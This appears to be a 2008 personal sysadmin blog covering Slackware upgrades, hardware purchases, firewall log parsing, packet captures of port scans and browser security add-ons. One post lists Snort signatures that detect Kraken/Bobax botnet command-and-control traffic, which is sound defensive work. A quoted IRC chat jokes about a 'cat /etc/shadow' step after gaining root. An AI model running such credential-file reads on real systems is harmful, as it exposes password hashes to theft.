-rw-r--r-- 1 root root 2088735 2007-07-01 19:12 httpd-2.2.4-i486-6.tgz
-rw-r--r-- 1 root root 1898552 2008-02-14 17:37 httpd-2.2.8-i486-1_slack12.0.tgz
-rw-r--r-- 1 root root 313616 2007-06-02 18:52 lsof-4.78-i486-1.tgz
-rw-r--r-- 1 root root 222760 2006-02-10 20:03 man-1.6c-i486-2.tgz
-rw-r--r-- 1 root root 1949092 2007-06-13 13:35 man-pages-2.55-noarch-1.tgz
-rw-r--r-- 1 root root 135893 2004-02-18 05:59 metamail-2.7-i486-2.tgz
-rw-r--r-- 1 root root 16756453 2007-03-24 00:52 mysql-5.0.37-i486-1.tgz
-rw-r--r-- 1 root root 16942549 2007-12-14 17:01 mysql-5.0.51-i486-1_slack12.0.tgz
-rw-r--r-- 1 root root 1483847 2007-05-07 01:15 ntp-4.2.4p0-i486-1.tgz
-rw-r--r-- 1 root root 3440059 2007-06-13 13:40 openssl-0.9.8e-i486-3.tgz
-rw-r--r-- 1 root root 836941 2007-06-13 13:40 openssl-solibs-0.9.8e-i486-3.tgz
-rw-r--r-- 1 root root 143713 2006-09-19 00:11 procmail-3.22-i486-2.tgz
-rw-r--r-- 1 root root 2450931 2003-10-29 01:08 rpm-4.2.1-i486-3.tgz
-rw-r--r-- 1 root root 4603 2007-01-04 22:28 rpm2tgz-1.0-i486-1.tgz
-rw-r--r-- 1 root root 212764 2007-02-10 14:52 rsync-2.6.9-i486-1.tgz
-rw-r--r-- 1 root root 1391679 2007-06-10 01:16 sendmail-8.14.1-i486-1.tgz
-rw-r--r-- 1 root root 276485 2007-06-10 01:16 sendmail-cf-8.14.1-noarch-1.tgz
-rw-r--r-- 1 root root 30270 2006-04-19 00:56 slocate-3.1-i486-1.tgz
-rw-r--r-- 1 root root 763394 2008-06-15 15:30 snort-2.6.1.5-i386-1.tgz
-rw-r--r-- 1 root root 137062 2006-02-06 14:00 sudo-1.6.8p12-i486-1.tgz
-rw-r--r-- 1 root root 1793130 2007-06-02 19:32 tcl-8.4.15-i486-1.tgz
-rw-r--r-- 1 root root 66773 2007-04-30 00:35 telnet-0.17-i486-1.tgz
-rw-r--r-- 1 root root 8614263 2007-06-20 16:34 vim-7.1.012-i486-1.tgz
-rw-r--r-- 1 root root 1882278 2007-06-20 16:50 vim-gvim-7.1.012-i486-1.tgz
-rw-r--r-- 1 root root 13573880 2008-05-26 00:19 webmin-1.420.tar.gz

Stability-wise, the server appears to be running somewhat more efficiently than before (for instance, the CPU and memory utilizations, along with IO, appear to be less 'spiky' when looking at chart readouts. When I shut down the server to upgrade (which is the way its done with Linode.com), I'd had 440+ days of uptime, so I can't argue about stability...it doesn't get much better than that!

Sooner or later, I'm going to try backing up my latest install, then trying to upgrade to v12.1 (just because I can).

wigglit.ath.cx being bombarded with scans of port 1028/UDP

2008-06-11T18:18:00.001-04:00

The culprit?

24.64.0.0/13, or 24.64.0.0 - 24.71.255.255, which resolves to SHAWCABLE.NET

There are at least 311 hosts within that range that have tried to connect to UDP port 1028 in the last few days. This isn't really a broad scan but the pepperings of hosts every day for the last few days, each one being unique hosts that have never been logged makes it hard to establish a pattern so that I can block remote hosts that continue to scan for this port, so I've opted to initiate a broad block and keep the block in place for maybe 30 days.

I'll monitor this activity and maybe alert the ISC diary if the scans continue.

If you're caught up in this ban, let me know and I'll see about allowing traffic to specific hosts.

Metaspolit hijacked?

2008-06-09T14:02:00.002-04:00

Monday morning, Metasploit.com was temporarily hijacked using an attack on the local area network of Metasploit's hosting provider.

More info here

Slamd64

2008-05-05T19:03:00.001-04:00

I've installed Slamd64 on my new AMD system. Initially, I had SATA issues that have mysteriously disappeared (no idea why, other than maybe swapping out that SATA cables helped). I installed using Disk 1 only (I didn't download anything else), which has the core system components. I then wanted to boot X, which required me downloading the X and KDE software. In fact, I went ahead and copied a whole mirror site and will continue to rsync the site against my local copy, using the updated local mirror as a upgrade repository.

I had issues getting my mouse recognized. I've a Logitech MX1000 wireless mouse, which is connected to a KVM. Slamd64 detects it as a PS/2 mouse. Slamd64 has PS/2 mice blacklisted, so I had to unblock the psmouse module from /etc/modules.d/blacklist (by uncommenting the module entry). Then I loaded the module and rebooted. The reboot detected the mouse. It took me a while to find this tidbit of info (although, it was recorded on the Slamd64 forums). I'll be adding this to my local knowledgbase (in fact, I need to add a whole Slamd64 category first).

I've also installed phpsysinfo on this machine, so I can see the hardware and how it is detected by this tool. From what I've seen so far, the second CPU core takes the brunt of the load, with the first CPU core assisting when the second is maxed out...I don't know if this is normal or a software issue (maybe phpsysinfo needs to be optimized for dual core usage?), but I only tested this by refreshing the phpsysinfo browser session (it appears to put a quick load on the system...dunno if that's normal or not).

Anyways, if things go well with this distro, I'll be using this machine as my main Linux machine, eventually.

AMD vs. Intel Comparison

2008-05-03T22:48:00.001-04:00

About the new AMD system I recently bought...

The AMD Athlon 64 X2 4400+ rocks when compared to my Intel system, which uses a Pentium D830. The AMD CPU is running on an Abit NF-M2SV board with 1GB of RAM. The Intel system is running on an ECS nForce 570 SLIT-A v5.1 mainboard and 2GB of RAM. While the Intel system outguns the AMD system, spec-wise, the AMD system is quite a bit more responsive...the whole system seems and responds like it is extremely lightweight. Both are running XP Pro. The AMD CPU runs 104F temps on the average, while the Intel CPU is in the 120F range...and this system has the beefier CPU fan/heatsink too! The AMD CPU cooler is here. It is an Arctic Cooling Freezer 64 LP. The Intel CPU cooler is here and is apparently a standard issue HSF (Intel Socket 775 Cooling Fan, although it is badged as an Ultra unit).

I'm very impressed!

No, I don't have any benchmark specs (you can probably find these online via Google), but this is really a seat-of-the-pants comparison. That I noticed such a difference in this manner should speak for itself.

Now, I've split the 250GB drive on the AMD system in half, to test Slamd64, an unofficial 64-bit port of Slackware (which is a 32-bit OS). I've run into issues booting up Slamd64, though...I've been getting SATA-specific errors that hint that the hard drive is going bad (which I seriously doubt). I think I've seen these errors before when I last installed Slackware on a SATA drive...I think I selected the wrong kernel. I need to select a kernel specific to SATA support. I'll work on this during the next 7 days and report my findings here.

I'm seriously thinking on swapping the Intel machine for the AMD one, since the AMD machine appears more robust.

Bake-off: NoScript and Firekeeper

2008-04-28T18:14:00.001-04:00

I decided to mention Firekeeper on the security forums at LQ.org. One of the moderators there mentioned that NoScript was better at blocking malcode than Firekeeper. In order to understand what he was talking about (I'm confused about that comment), I decided to install both to see if one can layer and leverage both of these tools. I also wanted to see which was better at blocking and alerting on malcode in general.

It appears that NoScript is specific to javascript, although it looks to detect cross-site scripting, flash, and MS' version of Flash. It also works via whitelists and blacklists and not pattern matching (other than focusing on the word "script" and occasionally focusing on "ath.cx" (I haven't determined why it does this yet).

Both tools work in conjunction with another fine, though (so far).

I'm partial to Snort because an efficient and focused rule will always beat someone adding a site to a whitelist. I've seen trusted sites be hacked before, so if a trusted site is violated and begins serving malware, you're going to be visiting that site and that site will be in your white list...with Firekeeper, it will alert and block any malicious traffic.

The bad thing about Firekeeper is that someone always has to maintain the ruleset (be it the user or the developer or a combination of both).

I'll continue to comment as I learn both tools.

Just ordered another machine

2008-04-24T17:32:00.001-04:00

Yeah, yeah, I've ordered yet ANOTHER machine:

Abit NF-M2SV GeForce 6100 Socket AM2 Motherboard
AMD Athlon 64 X2 4400+ Socket AM2 CPU
Crucial 1024MB PC4200 DDR2 533MHz (X2)
Seagate 250GB Serial ATA w/NCQ 7200/8MB/SATA-3G
Power Up Silver 5511 ATX Mid-T Case w/450w

All for $199 after $30 in rebates. Note that there's no CPU heatsink/fan, no OS, no CD/DVD burner, and no vidcard (although there's an integrated one on the motherboard, which may get me through the testing/burn-in phase).

I've just ordered an Arctic Cooling Freezer 64 LP CPU Cooler for $25 from Microcenter. I'll order a CD/DVD burner in another week, and within the next month, I'll install a new vidcard. I don't know what OS I'll utilize yet...maybe Linux, but more than likely Windows (only I don't want to buy Vista [or XP, really]).

At this point, the barebones I ordered last year is still the better computer, but I spent quite a bit more for it. Until the new one is up and running, I'm also using its 2gb of RAM in the older computer, for a total of 3gb of RAM (COD4 flies during loading!).

This is the deal I saw on Tigerdirect.com that made me purchase this machine.

Verizon hit with GPL copyright lawsuit over router software

2008-04-24T09:13:00.001-04:00

This article is old but interesting. I've this router and I've Verizon's FIOS service. Not long after purchasing this service, I perused Actiontec's website and had seen that they utilized Linux (this is, specifically, an issue with Verizon not including the source code for BusyBox to its customers, per v2 of the GPL) as the firmware for this router. I also saw that Verizon offered firmware versions for this router on their pages. I didn't think that they'd not release their software as GPL, though. I think it was either forgotten or GPL was taken for granted (because GPL software is usually free).

Anyways, this is a good read.

Port 33435

2008-04-14T09:35:00.000-04:00

I'm doing some additional research on this ISC SANS diary entry. It appears that I have a prominent host attempting to connect to port 33435/UDP. The traffic is showing in my FW logs but I wanted to get a sniff going to provide to ISC.sans.org.

I used the following to capture the traffic:

tcpdump -Xvvnnes -0 -i eth0 -w /tmp/isc-inv/isc-inv1 port 14323 or port 33435

I got seven hits over several days:

root@starchild:~# screen -r 32692
7 packets received by filter
0 packets dropped by kernel

root@starchild:~# tcpdump -Xvvnnes -0 -r /tmp/isc-inv/isc-inv1
reading from file /tmp/isc-inv/isc-inv1, link-type EN10MB (Ethernet)
20:59:13.181494 00:0c:db:fc:8b:59 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 46: (tos 0x0, ttl 1, id 659, offset 0, flags [none], proto UDP (17), length 32) 216.52.97.4.11941 > xxx.xxx.xxx.xxx.33435: [udp sum ok] UDP, length 4
0x0000: 4500 0020 0293 0000 0111 ae43 d834 6104 E..........C.4a.
0x0010: 42a0 8d1e 2ea5 829b 000c 8f00 6956 4d47 B...........iVMG
20:59:54.435063 00:0c:db:fc:8b:59 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 46: (tos 0x0, ttl 1, id 2451, offset 0, flags [none], proto UDP (17), length 32) 216.52.97.4.11941 > xxx.xxx.xxx.xxx.33435: [udp sum ok] UDP, length 4
0x0000: 4500 0020 0993 0000 0111 a743 d834 6104 E..........C.4a.
0x0010: 42a0 8d1e 2ea5 829b 000c 8f00 6956 4d47 B...........iVMG
21:00:35.451099 00:0c:db:fc:8b:59 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 46: (tos 0x0, ttl 1, id 4243, offset 0, flags [none], proto UDP (17), length 32) 216.52.97.4.11941 > xxx.xxx.xxx.xxx.33435: [udp sum ok] UDP, length 4
0x0000: 4500 0020 1093 0000 0111 a043 d834 6104 E..........C.4a.
0x0010: 42a0 8d1e 2ea5 829b 000c 8f00 6956 4d47 B...........iVMG
21:01:17.435358 00:0c:db:fc:8b:59 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 46: (tos 0x0, ttl 1, id 6035, offset 0, flags [none], proto UDP (17), length 32) 216.52.97.4.11941 > xxx.xxx.xxx.xxx.33435: [udp sum ok] UDP, length 4
0x0000: 4500 0020 1793 0000 0111 9943 d834 6104 E..........C.4a.
0x0010: 42a0 8d1e 2ea5 829b 000c 8f00 6956 4d47 B...........iVMG
21:01:58.435072 00:0c:db:fc:8b:59 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 46: (tos 0x0, ttl 1, id 7827, offset 0, flags [none], proto UDP (17), length 32) 216.52.97.4.11941 > xxx.xxx.xxx.xxx.33435: [udp sum ok] UDP, length 4
0x0000: 4500 0020 1e93 0000 0111 9243 d834 6104 E..........C.4a.
0x0010: 42a0 8d1e 2ea5 829b 000c 8f00 6956 4d47 B...........iVMG
21:02:40.432363 00:0c:db:fc:8b:59 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 46: (tos 0x0, ttl 1, id 9619, offset 0, flags [none], proto UDP (17), length 32) 216.52.97.4.11941 > xxx.xxx.xxx.xxx.33435: [udp sum ok] UDP, length 4
0x0000: 4500 0020 2593 0000 0111 8b43 d834 6104 E...%......C.4a.
0x0010: 42a0 8d1e 2ea5 829b 000c 8f00 6956 4d47 B...........iVMG
21:03:21.431071 00:0c:db:fc:8b:59 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 46: (tos 0x0, ttl 1, id 11411, offset 0, flags [none], proto UDP (17), length 32) 216.52.97.4.11941 > xxx.xxx.xxx.xxx.33435: [udp sum ok] UDP, length 4
0x0000: 4500 0020 2c93 0000 0111 8443 d834 6104 E...,......C.4a.
0x0010: 42a0 8d1e 2ea5 829b 000c 8f00 6956 4d47 B...........iVMG

I've not yet taken the time to delve into the capture (will have some time when I get home today).

BASH script to parse FW logs

2008-04-09T21:27:00.001-04:00

I've created a BASH script that parses my FW logs to show me the activity in one screen dump and also show me the total hit count per log file (I have my FW logs show in /var/log/messages).

The script is below:

root@starchild:/tmp# cat fwlogsearch2.sh
#!/bin/bash

# Searches FW logs on Linode, which are contained in /var/log/messages* files
#
# v0.1: couldn't get the script to work but could get the raw grep command to run flawlessly manually. Changed the "grep "$ip" /var/log/messages*" to "grep "$1" /var/log/messages*" and it worked! Same for the wordcount line.

function search {
local ip #ip is local to the function
echo "Searching... "
echo " "
grep "$1" /var/log/messages*
#cat /var/log/messages* | grep $ip
wordcount=`grep -c "$1" /var/log/messages*`
#wordcount=`cat /var/log/messages* | grep $ip | wc -l`
echo " "
echo "The number of instances this IP shows in $wordcount"
}
echo " "
echo " "
echo "Type in a number to search. Output will be dumped to stdout:"
read number
value_returned=$(search $number)
echo "$value_returned"
echo " "
echo " "

The results look like:

root@starchild:/tmp# ./fwlogsearch2.sh

Type in a number to search. Output will be dumped to stdout:
216.218.230.82
Searching...

/var/log/messages:Jun 3 05:23:30 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=216.218.230.82 DST=xxx.xxx.xxx.xxx LEN=48 TOS=0x00 PREC=0x00 TTL=125 ID=18621 DF PROTO=TCP SPT=1121 DPT=5900 WINDOW=65535 RES=0x00 SYN URGP=0
/var/log/messages:Jun 3 05:23:33 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=216.218.230.82 DST=xxx.xxx.xxx.xxx LEN=48 TOS=0x00 PREC=0x00 TTL=125 ID=19854 DF PROTO=TCP SPT=1121 DPT=5900 WINDOW=65535 RES=0x00 SYN URGP=0
/var/log/messages:Jun 21 15:57:52 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=216.218.230.82 DST=xxx.xxx.xxx.xxx LEN=48 TOS=0x00 PREC=0x00 TTL=125 ID=3853 DF PROTO=TCP SPT=45085 DPT=5900 WINDOW=65535 RES=0x00 SYN URGP=0
/var/log/messages:Jun 21 15:57:55 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=216.218.230.82 DST=xxx.xxx.xxx.xxx LEN=48 TOS=0x00 PREC=0x00 TTL=125 ID=5091 DF PROTO=TCP SPT=45085 DPT=5900 WINDOW=65535 RES=0x00 SYN URGP=0
/var/log/messages.1:May 29 22:08:44 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=216.218.230.82 DST=xxx.xxx.xxx.xxx LEN=48 TOS=0x00 PREC=0x00 TTL=125 ID=28369 DF PROTO=TCP SPT=29144 DPT=5900 WINDOW=65535 RES=0x00 SYN URGP=0
/var/log/messages.1:May 29 22:08:47 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=216.218.230.82 DST=xxx.xxx.xxx.xxx LEN=48 TOS=0x00 PREC=0x00 TTL=125 ID=29195 DF PROTO=TCP SPT=29144 DPT=5900 WINDOW=65535 RES=0x00 SYN URGP=0

The number of instances this IP shows in /var/log/messages:4
/var/log/messages.1:2
/var/log/messages.2:0
/var/log/messages.3:0
/var/log/messages.4:0

root@starchild:/tmp#

The plan is to add more functionality to this simple script (yeah, I'm enthused because I don't normally script things and rarely get it right without some type of extreme research or problem).

Regarding Snort, I've recently added the following sigs to all three of my IDSs (regarding detecting Kraken activity):

# Kraken sigs (Emerging Threats sigs)
alert tcp $HOME_NET 1024: -> $EXTERNAL_NET 447 (msg:"ET CURRENT_EVENTS Bobax/Kraken/Oderoor TCP 447 CnC? Channel Initial Packet Outbound"; flow:established; dsize:24; threshold:type threshold, track by_src, count 2, seconds 360; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/OdeRoor; sid:2008103; rev:1;)
alert udp $HOME_NET 1024: -> $EXTERNAL_NET 447 (msg:"ET CURRENT_EVENTS Bobax/Kraken/Oderoor UDP 447 CnC? Channel Initial Packet Outbound"; dsize:24; threshold:type threshold, track by_src, count 2, seconds 360; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/OdeRoor; sid:2008104; rev:1;)
alert udp $EXTERNAL_NET 447 -> $HOME_NET 1024: (msg:"ET CURRENT_EVENTS Bobax/Kraken/Oderoor UDP 447 CnC? Channel Initial Packet Inbound"; dsize:24; threshold:type threshold, track by_src, count 2, seconds 360; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/OdeRoor; sid:2008105; rev:1;)
alert tcp $EXTERNAL_NET 447 -> $HOME_NET 1024: (msg:"ET CURRENT_EVENTS Bobax/Kraken/Oderoor TCP 447 CnC? Channel Initial Packet Inbound"; flow:established; dsize:24; threshold:type threshold, track by_src, count 2, seconds 360; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/OdeRoor; sid:2008106; rev:1;)
alert udp $EXTERNAL_NET 447 -> $HOME_NET 1024: (msg:"ET CURRENT_EVENTS Possible Bobax/Kraken/Oderoor UDP 447 CnC? Channel Inbound"; threshold:type threshold, track by_src, count 5, seconds 60; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/OdeRoor; sid:2008107; rev:1;)
alert tcp $EXTERNAL_NET 447 -> $HOME_NET 1024: (msg:"ET CURRENT_EVENTS Possible Bobax/Kraken/Oderoor TCP 447 CnC? Channel Inbound"; flow:established; threshold:type threshold, track by_src, count 5, seconds 60; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/OdeRoor; sid:2008108; rev:1;)
alert udp $HOME_NET 1024: -> $EXTERNAL_NET 447 (msg:"ET CURRENT_EVENTS Possible Bobax/Kraken/Oderoor UDP 447 CnC? Channel Outbound"; threshold:type threshold, track by_src, count 5, seconds 60; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/OdeRoor; sid:2008109; rev:1;)
alert tcp $HOME_NET 1024: -> $EXTERNAL_NET 447 (msg:"ET CURRENT_EVENTS Possible Bobax/Kraken/Oderoor TCP 447 CnC? Channel Outbound"; flow:established; threshold:type threshold, track by_src, count 5, seconds 60; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/OdeRoor; sid:2008110; rev:1;)

I doubt I'll see anything, but I'm a bit concerned, as this malware affects Windows systems and is supposed to alert on non-internet activity...I do have Windows machines on my LAN.

I also conducted some research on this ISC SANS diary entry. It appears that I have a prominent host attempting to connect to port 33435/UDP. I counted 50 FW log hits from maybe 4 different IPs, with one IP being more active than the rest.

root@starchild:/tmp# cat /var/log/messages* | grep "PT=33435" | wc -l
50

root@starchild:/tmp# whois 216.52.97.4
Internap Network Services PNAP-8-98 (NET-216-52-0-0-1)
216.52.0.0 - 216.52.255.255
InterNAP Network Services, PNAP-OCY PNAP-OCY-INAP-BB-1 (NET-216-52-96-0-1)
216.52.96.0 - 216.52.97.255

Looking at my logs, I also see 33436/UDP, 33437/UDP, 33438/UDP, and 33439/UDP being hit by hosts from PNAP hosts...strange...I'm thinking about blocking that whole huge range.

Anyways, I thought some of this would be cool to share.

Until next time!

Firekeeper, an IDPS system (plugin) for Firefox

2008-03-30T23:31:00.001-04:00

http://isc.sans.org/diary.html?storyid=2403 explains Firekeeper, an IDS/IPS Firefox browser plugin.

I'm running it on two machines that run Slackware (versions 11.0 and 12.0). I may throw it on my work machine (which runs Windows XP), but that may be a bit daring.

Firekeeper's homepage is at http://firekeeper.mozdev.org/installation.html

Please share your experiences with this plugin...this is a great idea and may be a Holy Grail for malware that infects via browsers.

Also, I've found what may be a good security site, http://www.megasecurity.org/Main.html. It may take me awhile to read, as it has tons of data, it seems.

Kernel Upgrade

2008-02-21T20:03:00.001-05:00

I've done the following (copy/paste):

root@slackbox:~/kernel-patches# ls
kernel-generic-2.6.21.5-i486-2_slack12.0.tgz
kernel-generic-smp-2.6.21.5_smp-i686-2_slack12.0.tgz
kernel-huge-2.6.21.5-i486-2_slack12.0.tgz
kernel-huge-smp-2.6.21.5_smp-i686-2_slack12.0.tgz
root@slackbox:~/kernel-patches# md5sum kernel-*
ebf025aa30af925ac6817fe58811e921 kernel-generic-2.6.21.5-i486-2_slack12.0.tgz
e35c66f2d765a221b509f1b7b463c9fe kernel-generic-smp-2.6.21.5_smp-i686-2_slack12.0.tgz
3f9e3783dd7d799a277ec3e79e8bb82d kernel-huge-2.6.21.5-i486-2_slack12.0.tgz
0503193191731bba693ed6ce35b8c26d kernel-huge-smp-2.6.21.5_smp-i686-2_slack12.0.tgz
root@slackbox:~/kernel-patches#
root@slackbox:~/kernel-patches#
root@slackbox:~/kernel-patches#
root@slackbox:~/kernel-patches# upgradepkg kernel-generic-2.6.21.5-i486-2_slack12.0.tgz

+==============================================================================
| Upgrading kernel-generic-2.6.21.5-i486-2 package using ./kernel-generic-2.6.21.5-i486-2_slack12.0.tgz
+==============================================================================

Pre-installing package kernel-generic-2.6.21.5-i486-2_slack12.0...

Removing package /var/log/packages/kernel-generic-2.6.21.5-i486-2-upgraded-2008-02-21,19:59:56...

Installing package kernel-generic-2.6.21.5-i486-2_slack12.0...
PACKAGE DESCRIPTION:
kernel-generic: kernel-generic (a general purpose single processor Linux kernel)
kernel-generic:
kernel-generic: This is a Linux kernel with built-in support for most IDE controllers.
kernel-generic: For filesystem support, or if you need to load support for a SCSI or
kernel-generic: other controller, then you'll need to load one or more kernel modules
kernel-generic: using an initial ramdisk, or initrd. For more information about
kernel-generic: creating an initrd, see the README.initrd file in the /boot directory.
kernel-generic:
Executing install script for kernel-generic-2.6.21.5-i486-2_slack12.0...

Package kernel-generic-2.6.21.5-i486-2 upgraded with new package ./kernel-generic-2.6.21.5-i486-2_slack12.0.tgz.

root@slackbox:~/kernel-patches# upgradepkg kernel-generic-smp-2.6.21.5_smp-i686-2_slack12.0.tgz

+==============================================================================
| Upgrading kernel-generic-smp-2.6.21.5_smp-i686-2 package using ./kernel-generic-smp-2.6.21.5_smp-i686-2_slack12.0.tgz
+==============================================================================

Pre-installing package kernel-generic-smp-2.6.21.5_smp-i686-2_slack12.0...

Removing package /var/log/packages/kernel-generic-smp-2.6.21.5_smp-i686-2-upgraded-2008-02-21,20:01:00...

Installing package kernel-generic-smp-2.6.21.5_smp-i686-2_slack12.0...
PACKAGE DESCRIPTION:
kernel-generic-smp: kernel-generic-smp (a general purpose SMP Linux kernel)
kernel-generic-smp:
kernel-generic-smp: This is a Linux kernel with built-in support for most disk
kernel-generic-smp: controllers. To use filesystems, or to load support for a SCSI or
kernel-generic-smp: other controller, then you'll need to load one or more kernel
kernel-generic-smp: modules using an initial ramdisk, or initrd. For more information
kernel-generic-smp: about creating an initrd, see the README.initrd file in the /boot
kernel-generic-smp: directory.
kernel-generic-smp:
kernel-generic-smp: SMP is "Symmetric multiprocessing", or multiple CPU/core support.
kernel-generic-smp:
Executing install script for kernel-generic-smp-2.6.21.5_smp-i686-2_slack12.0...

Package kernel-generic-smp-2.6.21.5_smp-i686-2 upgraded with new package ./kernel-generic-smp-2.6.21.5_smp-i686-2_slack12.0.tgz.

root@slackbox:~/kernel-patches# upgradepkg kernel-huge-2.6.21.5-i486-2_slack12.0.tgz

+==============================================================================
| Upgrading kernel-huge-2.6.21.5-i486-2 package using ./kernel-huge-2.6.21.5-i486-2_slack12.0.tgz
+==============================================================================

Pre-installing package kernel-huge-2.6.21.5-i486-2_slack12.0...

Removing package /var/log/packages/kernel-huge-2.6.21.5-i486-2-upgraded-2008-02-21,20:01:34...

Installing package kernel-huge-2.6.21.5-i486-2_slack12.0...
PACKAGE DESCRIPTION:
kernel-huge: kernel-huge (a fully-loaded single processor Linux kernel)
kernel-huge:
kernel-huge: This is a Linux kernel with built-in support for most disk controllers
kernel-huge: and filesystems. If you're looking for a more stripped down kernel
kernel-huge: (this one contains everything but the kitchen sink ;-), then install
kernel-huge: the kernel-generic from the /boot directory along with an initrd to
kernel-huge: load support for your boot device and filesystem. For instructions
kernel-huge: on the initrd, see README.initrd in the /boot directory.
kernel-huge:
Executing install script for kernel-huge-2.6.21.5-i486-2_slack12.0...

Package kernel-huge-2.6.21.5-i486-2 upgraded with new package ./kernel-huge-2.6.21.5-i486-2_slack12.0.tgz.

root@slackbox:~/kernel-patches# upgradepkg kernel-huge-smp-2.6.21.5_smp-i686-2_slack12.0.tgz

+==============================================================================
| Upgrading kernel-huge-smp-2.6.21.5_smp-i686-2 package using ./kernel-huge-smp-2.6.21.5_smp-i686-2_slack12.0.tgz
+==============================================================================

Pre-installing package kernel-huge-smp-2.6.21.5_smp-i686-2_slack12.0...

Removing package /var/log/packages/kernel-huge-smp-2.6.21.5_smp-i686-2-upgraded-2008-02-21,20:02:13...

Installing package kernel-huge-smp-2.6.21.5_smp-i686-2_slack12.0...
PACKAGE DESCRIPTION:
kernel-huge-smp: kernel-huge-smp (a fully-loaded SMP Linux kernel)
kernel-huge-smp:
kernel-huge-smp: This is a Linux kernel with built-in support for most disk
kernel-huge-smp: controllers. If you're looking for a more stripped down kernel
kernel-huge-smp: (this one contains everything but the kitchen sink ;-), then install
kernel-huge-smp: the kernel-generic-smp in the /boot directory along with an initrd to
kernel-huge-smp: load support for your boot device and filesystem. For instructions
kernel-huge-smp: on the initrd, see README.initrd in the /boot directory.
kernel-huge-smp:
kernel-huge-smp: SMP is "Symmetric multiprocessing", or multiple CPU/core support.
kernel-huge-smp:
Executing install script for kernel-huge-smp-2.6.21.5_smp-i686-2_slack12.0...

Package kernel-huge-smp-2.6.21.5_smp-i686-2 upgraded with new package ./kernel-huge-smp-2.6.21.5_smp-i686-2_slack12.0.tgz.

root@slackbox:~/kernel-patches#

root@slackbox:~/kernel-patches# lilo
Fatal: VolumeID read error: sector 0 of /dev/sda not readable

OUCH!

I read this: http://unixadmintalk.com/f11/lilo-fails-dev-sda-not-readable-65533/

It appears to help:

root@slackbox:~/kernel-patches# lilo
Warning: bypassing VolumeID scan of drive flagged INACCESSIBLE: /dev/sda
Warning: The boot sector and map file are on different disks.
Added Windows *
Added Linux
2 warnings were issued.

Will reboot then test to see if this upgraded kernel is still vulnerable...

Kernel vulnerabilities affecting Linux machines

2008-02-17T19:49:00.000-05:00

Whenever there's some kernel-level vulnerability, it seems that the whole community goes ape-crap over something that should be a no-brainer.

The recent vulnerability is documented here:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0010
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0163
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600

So, what's the big deal? It is a locally exploitable vulnerability. Everyone is acting like its the end of the world. Why? Are people actually giving people access to their systems that they don't trust? Why am I not worried? Because I want to learn things about security. Think about this for a second: in an enterprise environment, you're not going to be able to always apply kernel patches to production machines. You're not always going to be able to test by standing up a development environment. There is not always going to be one distribution used and not every platform will share the same hardware. What's readily apparent is that security should always be applied in layers. This means that no one should be accessing machines on your local network that you can't trust. If someone is not trustworthy, you should always be worrying about what they're doing on the network, instead of only when kernel-level vulnerabilities are discovered.

Does that lessen the responsibility of the system admins? No, but if everyone thought less of patching applications and more as a security administrator, the workload of the system administrator would probably be less. What I'm seeing in chatrooms and forums is this: "Oh shit...this exploit gives local root access...I have to apply this patch NOW!!" Someone said something similar in an IRC channel that I frequent:

SiegeX - I dunno, having a local root exploit (which ive tested with existing code) on a box that runs any sort of service would worry the hell out of me
W|GGL|T - SiegeX: in all actuality, you could have root exploits locally all over the place and you'd not know about it
SiegeX - and I probably do, but its no excuse for not patching the ones I do
W|GGL|T - security is more than just patching....in a corporate scenario, you have to balance out if you can even apply the patch....you bet your ass we're not going to take down a production system that has a localized vulnerability if it is indeed only local
SiegeX - heh, step 1) su root 2) cat /etc/shadow 3) ??? 4) profit
W|GGL|T - its called mitigation
W|GGL|T - if security is applied in layers, certain risks are lessened
SiegeX - W|GGL|T: why wouldnt you apply the patch on a production clone for testing purposes and do regression testing on that to make sure everything is a-ok before moving it over ?
W|GGL|T - SiegeX: if the corporate network has 10 different security layers, the need for immediate patching is small. sure, we'd patch but we'd do it in a sane manner
SiegeX - W|GGL|T: since you're into the corp security let me ask you if there was a solid way for a corp to not allow outbound tunnels while still allowing https?
SiegeX - s/was/is
W|GGL|T - SiegeX: nope, but then again, those who don't follow corporate policy need to be fired
SiegeX - afaik, if you tunnel over https, not even a L7 filter will look at it funny since the connection setup looks legit. Only thing i can think of is traffic analysis
W|GGL|T - there are always checks and balances
W|GGL|T - SiegeX: hrmm....there is IDS
W|GGL|T - and there is also a concept called behavioral analysis

